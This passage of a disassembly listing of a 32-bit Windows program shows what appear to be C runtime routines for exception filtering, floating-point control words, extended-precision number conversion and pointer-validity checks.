loc_41DAB5: ; CODE XREF: sub_41D965+2E�j
; sub_41D965+59�j ...
pop esi
leave
retn
sub_41D965 endp
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
xor edx, edx
mov eax, offset dword_436138
loc_41DAC3: ; CODE XREF: .text:0041DAD0�j
cmp ecx, [eax]
jz short loc_41DAD2
add eax, 8
inc edx
cmp eax, offset dword_4361C8
jl short loc_41DAC3
loc_41DAD2: ; CODE XREF: .text:0041DAC5�j
mov eax, edx
shl eax, 3
cmp ecx, dword_436138[eax]
jnz short loc_41DAE6
mov eax, off_43613C[eax]
retn
; ---------------------------------------------------------------------------
loc_41DAE6: ; CODE XREF: .text:0041DADD�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_41DAE9 proc near ; DATA XREF: sub_41DB2F�o
; .data:00435AC0�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41DB0C
cmp dword ptr [eax+10h], 3
jnz short loc_41DB0C
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41DB0C
jmp sub_41A91C
; ---------------------------------------------------------------------------
loc_41DB0C: ; CODE XREF: sub_41DAE9+D�j
; sub_41DAE9+13�j ...
mov eax, dword_4929B4
test eax, eax
jz short loc_41DB29
push eax
call sub_41E3A2
test eax, eax
pop ecx
jz short loc_41DB29
push esi
call dword_4929B4
jmp short loc_41DB2B
; ---------------------------------------------------------------------------
loc_41DB29: ; CODE XREF: sub_41DAE9+2A�j
; sub_41DAE9+35�j
xor eax, eax
loc_41DB2B: ; CODE XREF: sub_41DAE9+3E�j
pop esi
retn 4
sub_41DAE9 endp
; =============== S U B R O U T I N E =======================================
sub_41DB2F proc near ; DATA XREF: .data:00429528�o
push offset sub_41DAE9
call ds:dword_495310 ; SetUnhandledExceptionFilter
mov dword_4929B4, eax
retn
sub_41DB2F endp
; =============== S U B R O U T I N E =======================================
sub_41DB40 proc near ; DATA XREF: .data:00429B40�o
push dword_4929B4
call ds:dword_495310 ; SetUnhandledExceptionFilter
retn
sub_41DB40 endp
; =============== S U B R O U T I N E =======================================
sub_41DB4D proc near ; CODE XREF: sub_4198D1+52�p
xor eax, eax
retn
sub_41DB4D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
fstsw word ptr [ebp-4]
push dword ptr [ebp-4]
call sub_41DD07
pop ecx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
fnstsw word ptr [ebp-4]
fnclex
push dword ptr [ebp-4]
call sub_41DD07
pop ecx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB77 proc near ; CODE XREF: sub_41DBAC+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_41DBEC
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_41DC7E
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_41DB77 endp
; =============== S U B R O U T I N E =======================================
sub_41DBAC proc near ; CODE XREF: sub_419C21+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41DB77
pop ecx
pop ecx
retn
sub_41DBAC endp
; ---------------------------------------------------------------------------
push esi
mov esi, dword_4928A4
fninit
call sub_419C21
test esi, esi
jz short loc_41DBEA
mov eax, [esi+4]
test dword ptr [eax], 10008h
jz short loc_41DBEA
and dword ptr [eax+20h], 0
mov dword ptr [eax+24h], 0FFFFh
loc_41DBEA: ; CODE XREF: .text:0041DBD2�j
; .text:0041DBDD�j
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_41DBEC proc near ; CODE XREF: sub_41DB77+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_41DBFD
push 10h
pop eax
loc_41DBFD: ; CODE XREF: sub_41DBEC+C�j
test bl, 4
jz short loc_41DC04
or al, 8
loc_41DC04: ; CODE XREF: sub_41DBEC+14�j
test bl, 8
jz short loc_41DC0B
or al, 4
loc_41DC0B: ; CODE XREF: sub_41DBEC+1B�j
test bl, 10h
jz short loc_41DC12
or al, 2
loc_41DC12: ; CODE XREF: sub_41DBEC+22�j
test bl, 20h
jz short loc_41DC19
or al, 1
loc_41DC19: ; CODE XREF: sub_41DBEC+29�j
test bl, 2
jz short loc_41DC23
or eax, 80000h
loc_41DC23: ; CODE XREF: sub_41DBEC+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_41DC5B
cmp edx, 400h
jz short loc_41DC58
cmp edx, 800h
jz short loc_41DC54
cmp edx, esi
jnz short loc_41DC5B
or eax, edi
jmp short loc_41DC5B
; ---------------------------------------------------------------------------
loc_41DC54: ; CODE XREF: sub_41DBEC+5E�j
or eax, ebp
jmp short loc_41DC5B
; ---------------------------------------------------------------------------
loc_41DC58: ; CODE XREF: sub_41DBEC+56�j
or ah, 1
loc_41DC5B: ; CODE XREF: sub_41DBEC+4E�j
; sub_41DBEC+62�j ...
and ecx, edi
pop esi
jz short loc_41DC6B
cmp ecx, ebp
jnz short loc_41DC70
or eax, 10000h
jmp short loc_41DC70
; ---------------------------------------------------------------------------
loc_41DC6B: ; CODE XREF: sub_41DBEC+72�j
or eax, 20000h
loc_41DC70: ; CODE XREF: sub_41DBEC+76�j
; sub_41DBEC+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_41DC7D
or eax, 40000h
locret_41DC7D: ; CODE XREF: sub_41DBEC+8A�j
retn
sub_41DBEC endp
; =============== S U B R O U T I N E =======================================
sub_41DC7E proc near ; CODE XREF: sub_41DB77+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_41DC8E
push 1
pop eax
loc_41DC8E: ; CODE XREF: sub_41DC7E+B�j
test bl, 8
jz short loc_41DC95
or al, 4
loc_41DC95: ; CODE XREF: sub_41DC7E+13�j
test bl, 4
jz short loc_41DC9C
or al, 8
loc_41DC9C: ; CODE XREF: sub_41DC7E+1A�j
test bl, 2
jz short loc_41DCA3
or al, 10h
loc_41DCA3: ; CODE XREF: sub_41DC7E+21�j
test bl, 1
jz short loc_41DCAA
or al, 20h
loc_41DCAA: ; CODE XREF: sub_41DC7E+28�j
test ebx, 80000h
jz short loc_41DCB4
or al, 2
loc_41DCB4: ; CODE XREF: sub_41DC7E+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_41DCE1
cmp ecx, 100h
jz short loc_41DCDE
cmp ecx, esi
jz short loc_41DCD9
cmp ecx, edx
jnz short loc_41DCE1
or ah, 0Ch
jmp short loc_41DCE1
; ---------------------------------------------------------------------------
loc_41DCD9: ; CODE XREF: sub_41DC7E+50�j
or ah, 8
jmp short loc_41DCE1
; ---------------------------------------------------------------------------
loc_41DCDE: ; CODE XREF: sub_41DC7E+4C�j
or ah, 4
loc_41DCE1: ; CODE XREF: sub_41DC7E+44�j
; sub_41DC7E+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41DCF7
cmp ecx, 10000h
jnz short loc_41DCF9
or eax, esi
jmp short loc_41DCF9
; ---------------------------------------------------------------------------
loc_41DCF7: ; CODE XREF: sub_41DC7E+6B�j
or eax, edx
loc_41DCF9: ; CODE XREF: sub_41DC7E+73�j
; sub_41DC7E+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_41DD06
or ah, 10h
locret_41DD06: ; CODE XREF: sub_41DC7E+83�j
retn
sub_41DC7E endp
; =============== S U B R O U T I N E =======================================
sub_41DD07 proc near ; CODE XREF: .text:0041DB5B�p
; .text:0041DB6F�p
arg_0 = byte ptr 4
mov cl, [esp+arg_0]
xor eax, eax
test cl, 1
jz short loc_41DD15
push 10h
pop eax
loc_41DD15: ; CODE XREF: sub_41DD07+9�j
test cl, 4
jz short loc_41DD1C
or al, 8
loc_41DD1C: ; CODE XREF: sub_41DD07+11�j
test cl, 8
jz short loc_41DD23
or al, 4
loc_41DD23: ; CODE XREF: sub_41DD07+18�j
test cl, 10h
jz short loc_41DD2A
or al, 2
loc_41DD2A: ; CODE XREF: sub_41DD07+1F�j
test cl, 20h
jz short loc_41DD31
or al, 1
loc_41DD31: ; CODE XREF: sub_41DD07+26�j
test cl, 2
jz short locret_41DD3B
or eax, 80000h
locret_41DD3B: ; CODE XREF: sub_41DD07+2D�j
retn
sub_41DD07 endp
; =============== S U B R O U T I N E =======================================
sub_41DD3C proc near ; CODE XREF: sub_41DDDB+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_41DD81
inc esi
cmp esi, 3
jge short loc_41DD7C
lea eax, [eax+esi*4]
loc_41DD6E: ; CODE XREF: sub_41DD3C+3E�j
cmp dword ptr [eax], 0
jnz short loc_41DD81
inc esi
add eax, 4
cmp esi, 3
jl short loc_41DD6E
loc_41DD7C: ; CODE XREF: sub_41DD3C+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DD81: ; CODE XREF: sub_41DD3C+27�j
; sub_41DD3C+35�j
xor eax, eax
pop esi
retn
sub_41DD3C endp
; =============== S U B R O U T I N E =======================================
sub_41DD85 proc near ; CODE XREF: sub_41DDDB+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_41F893
add esp, 0Ch
dec esi
js short loc_41DDD7
lea edi, [ebx+esi*4]
loc_41DDBE: ; CODE XREF: sub_41DD85+50�j
test eax, eax
jz short loc_41DDD7
push edi
push 1
push dword ptr [edi]
call sub_41F893
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41DDBE
loc_41DDD7: ; CODE XREF: sub_41DD85+34�j
; sub_41DD85+3B�j
pop edi
pop esi
pop ebx
retn
sub_41DD85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDDB proc near ; CODE XREF: sub_41DF36+81�p
; sub_41DF36+CC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_41DE3F
inc ebx
push ebx
push [ebp+arg_0]
call sub_41DD3C
pop ecx
test eax, eax
pop ecx
jnz short loc_41DE3C
push edi
push [ebp+arg_0]
call sub_41DD85
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_41DE3C: ; CODE XREF: sub_41DDDB+51�j
mov eax, [ebp+arg_4]
loc_41DE3F: ; CODE XREF: sub_41DDDB+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_41DE5F
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_41DE5F: ; CODE XREF: sub_41DDDB+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41DDDB endp
; =============== S U B R O U T I N E =======================================
sub_41DE67 proc near ; CODE XREF: sub_41DF36+75�p
; sub_41DF36+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_41DE75: ; CODE XREF: sub_41DE67+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41DE75
pop esi
retn
sub_41DE67 endp
; =============== S U B R O U T I N E =======================================
sub_41DE82 proc near ; CODE XREF: sub_41DF36+5F�p
; sub_41DF36+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_41DE82 endp
; =============== S U B R O U T I N E =======================================
sub_41DE8E proc near ; CODE XREF: sub_41DF36+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_41DE94: ; CODE XREF: sub_41DE8E+12�j
cmp dword ptr [eax], 0
jnz short loc_41DEA6
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_41DE94
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41DEA6: ; CODE XREF: sub_41DE8E+9�j
xor eax, eax
retn
sub_41DE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEA9 proc near ; CODE XREF: sub_41DF36+C0�p
; sub_41DF36+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_41DEDF: ; CODE XREF: sub_41DEA9+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_41DEDF
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_41DF11: ; CODE XREF: sub_41DEA9+86�j
cmp ebx, edi
jl short loc_41DF24
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_41DF2B
; ---------------------------------------------------------------------------
loc_41DF24: ; CODE XREF: sub_41DEA9+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_41DF2B: ; CODE XREF: sub_41DEA9+79�j
dec ebx
sub ecx, 4
jns short loc_41DF11
pop edi
pop esi
pop ebx
leave
retn
sub_41DEA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF36 proc near ; CODE XREF: sub_41E0A2+D�p
; sub_41E0B8+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_41DFA3
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_41DE8E
test eax, eax
pop ecx
jnz loc_41E062
lea eax, [ebp+var_C]
push eax
call sub_41DE82
pop ecx
loc_41DF9B: ; CODE XREF: sub_41DF36+E4�j
push 2
loc_41DF9D: ; CODE XREF: sub_41DF36+110�j
pop eax
jmp loc_41E064
; ---------------------------------------------------------------------------
loc_41DFA3: ; CODE XREF: sub_41DF36+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41DE67
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41DDDB
add esp, 10h
test eax, eax
jz short loc_41DFC4
inc ebx
loc_41DFC4: ; CODE XREF: sub_41DF36+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_41DFDC
lea eax, [ebp+var_C]
push eax
call sub_41DE82
pop ecx
jmp short loc_41E018
; ---------------------------------------------------------------------------
loc_41DFDC: ; CODE XREF: sub_41DF36+98�j
cmp ebx, eax
jg short loc_41E01F
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41DE67
lea eax, [ebp+var_C]
push esi
push eax
call sub_41DEA9
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41DDDB
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41DEA9
add esp, 20h
loc_41E018: ; CODE XREF: sub_41DF36+A4�j
xor esi, esi
jmp loc_41DF9B
; ---------------------------------------------------------------------------
loc_41E01F: ; CODE XREF: sub_41DF36+A8�j
cmp ebx, [edi]
jl short loc_41E04B
lea eax, [ebp+var_C]
push eax
call sub_41DE82
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41DEA9
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_41DF9D
; ---------------------------------------------------------------------------
loc_41E04B: ; CODE XREF: sub_41DF36+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_41DEA9
pop ecx
pop ecx
loc_41E062: ; CODE XREF: sub_41DF36+55�j
xor eax, eax
loc_41E064: ; CODE XREF: sub_41DF36+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_41E093
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_41E09D
; ---------------------------------------------------------------------------
loc_41E093: ; CODE XREF: sub_41DF36+14E�j
cmp edi, 20h
jnz short loc_41E09D
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_41E09D: ; CODE XREF: sub_41DF36+15B�j
; sub_41DF36+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DF36 endp
; =============== S U B R O U T I N E =======================================
sub_41E0A2 proc near ; CODE XREF: sub_41E148+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_4361D0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41DF36
add esp, 0Ch
retn
sub_41E0A2 endp
; =============== S U B R O U T I N E =======================================
sub_41E0B8 proc near ; CODE XREF: sub_41E1A3+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_4361E8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41DF36
add esp, 0Ch
retn
sub_41E0B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0CE proc near ; CODE XREF: .text:0041E199�p
; .text:0041FF2C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push esi
push edi
and [ebp+var_4], 0
mov cx, [eax+0Ah]
push 40h
mov esi, ecx
and ecx, 8000h
mov edi, ecx
mov ecx, [eax+6]
mov [ebp+var_10], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
mov [ebp+var_8], eax
lea eax, [ebp+var_10]
push eax
and esi, 7FFFh
mov [ebp+var_C], ecx
call sub_41DDDB
pop ecx
test eax, eax
pop ecx
jz short loc_41E11F
mov ecx, 80000000h
inc esi
jmp short loc_41E122
; ---------------------------------------------------------------------------
loc_41E11F: ; CODE XREF: sub_41E0CE+47�j
mov ecx, [ebp+var_10]
loc_41E122: ; CODE XREF: sub_41E0CE+4F�j
cmp si, 7FFFh
jnz short loc_41E130
mov [ebp+var_4], 1
loc_41E130: ; CODE XREF: sub_41E0CE+59�j
mov eax, [ebp+arg_4]
or edi, esi
mov [eax+4], ecx
mov ecx, [ebp+var_C]
mov [eax+8], di
mov [eax], ecx
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_41E0CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E148 proc near ; CODE XREF: sub_419D5A+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FA34
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E0A2
add esp, 24h
leave
retn
sub_41E148 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push 1
push dword ptr [ebp+0Ch]
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-0Ch]
push eax
call sub_41FA34
push dword ptr [ebp+8]
lea eax, [ebp-0Ch]
push eax
call sub_41E0CE
add esp, 24h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1A3 proc near ; CODE XREF: sub_419D5A+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41FA34
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E0B8
add esp, 24h
leave
retn
sub_41E1A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1D0 proc near ; CODE XREF: sub_419D98+65�p
; sub_419E9C+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_41E20D
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41E1F3: ; CODE XREF: sub_41E1D0+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41E1FF
movsx edx, dl
inc ecx
jmp short loc_41E202
; ---------------------------------------------------------------------------
loc_41E1FF: ; CODE XREF: sub_41E1D0+27�j
push 30h
pop edx
loc_41E202: ; CODE XREF: sub_41E1D0+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41E1F3
mov edx, [ebp+arg_8]
loc_41E20D: ; CODE XREF: sub_41E1D0+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41E226
cmp byte ptr [ecx], 35h
jl short loc_41E226
loc_41E219: ; CODE XREF: sub_41E1D0+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_41E224
mov byte ptr [eax], 30h
jmp short loc_41E219
; ---------------------------------------------------------------------------
loc_41E224: ; CODE XREF: sub_41E1D0+4D�j
inc byte ptr [eax]
loc_41E226: ; CODE XREF: sub_41E1D0+42�j
; sub_41E1D0+47�j
cmp byte ptr [esi], 31h
jnz short loc_41E230
inc dword ptr [edx+4]
jmp short loc_41E242
; ---------------------------------------------------------------------------
loc_41E230: ; CODE XREF: sub_41E1D0+59�j
push edi
call sub_4158E0
inc eax
push eax
push edi
push esi
call sub_416430
add esp, 10h
loc_41E242: ; CODE XREF: sub_41E1D0+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41E1D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E247 proc near ; CODE XREF: sub_419D98+3F�p
; sub_419E9C+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E2AB
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_4929B8
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_41FF41
mov dword_4929E0, eax
add esp, 18h
movsx eax, byte_4929BA
mov dword_4929D8, eax
pop edi
movsx eax, word_4929B8
mov dword_4929DC, eax
mov dword_4929E4, offset dword_4929BC
mov eax, offset dword_4929D8
pop esi
leave
retn
sub_41E247 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2AB proc near ; CODE XREF: sub_41E247+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_41E2F9
cmp ebx, edi
jz short loc_41E2F2
lea edi, [ecx+3C00h]
jmp short loc_41E31A
; ---------------------------------------------------------------------------
loc_41E2F2: ; CODE XREF: sub_41E2AB+3D�j
mov edi, 7FFFh
jmp short loc_41E31A
; ---------------------------------------------------------------------------
loc_41E2F9: ; CODE XREF: sub_41E2AB+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41E311
cmp edx, ebx
jnz short loc_41E311
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41E35C
; ---------------------------------------------------------------------------
loc_41E311: ; CODE XREF: sub_41E2AB+52�j
; sub_41E2AB+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41E31A: ; CODE XREF: sub_41E2AB+45�j
; sub_41E2AB+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_41E332: ; CODE XREF: sub_41E2AB+A6�j
test ecx, esi
jnz short loc_41E353
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_41E332
; ---------------------------------------------------------------------------
loc_41E353: ; CODE XREF: sub_41E2AB+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41E35C: ; CODE XREF: sub_41E2AB+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E2AB endp
; ---------------------------------------------------------------------------
push 2
call sub_417FC6
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_41E36A proc near ; CODE XREF: sub_41A170+6B�p
; sub_41A681+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_49530C ; IsBadReadPtr
test eax, eax
jz short loc_41E382
xor esi, esi
loc_41E382: ; CODE XREF: sub_41E36A+14�j
mov eax, esi
pop esi
retn
sub_41E36A endp
; =============== S U B R O U T I N E =======================================
sub_41E386 proc near ; CODE XREF: sub_41A681+73�p
; sub_41A681+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_495460 ; IsBadWritePtr
test eax, eax
jz short loc_41E39E
xor esi, esi
loc_41E39E: ; CODE XREF: sub_41E386+14�j
mov eax, esi
pop esi
retn
sub_41E386 endp
; =============== S U B R O U T I N E =======================================
sub_41E3A2 proc near ; CODE XREF: sub_41A681+15B�p
; sub_41DAE9+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call ds:dword_495308 ; IsBadCodePtr
test eax, eax
jz short loc_41E3B6
xor esi, esi
